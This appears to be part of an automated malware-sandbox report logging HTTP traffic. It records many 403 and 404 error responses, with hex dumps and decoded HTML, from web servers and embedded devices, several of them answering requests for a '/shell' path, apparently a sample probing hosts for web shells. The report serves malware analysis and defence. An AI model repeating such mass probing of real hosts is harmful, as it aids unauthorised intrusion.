      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:35 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 203Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:56 GMTServer: CANON HTTP ServerContent-Type: text/htmlContent-Length: 74
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:07:42 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 19 Jul 2022 11:07:43 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 12:07:42 GMTServer: App-webs/Content-Length: 181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:44 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:07:44 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:07:23 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 19 Jul 2022 11:07:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Keep-Alive: timeout=5Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:46 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:47 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /shell was not found on this server.</BODY></HTML>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:47 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:47 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheExpires: 0Date: Tue, 19 Jul 2022 07:07:47 GMTContent-Type: text/htmlConnection: Keep-AliveData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR></BODY></HTML>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:07:51 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=utf-8X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 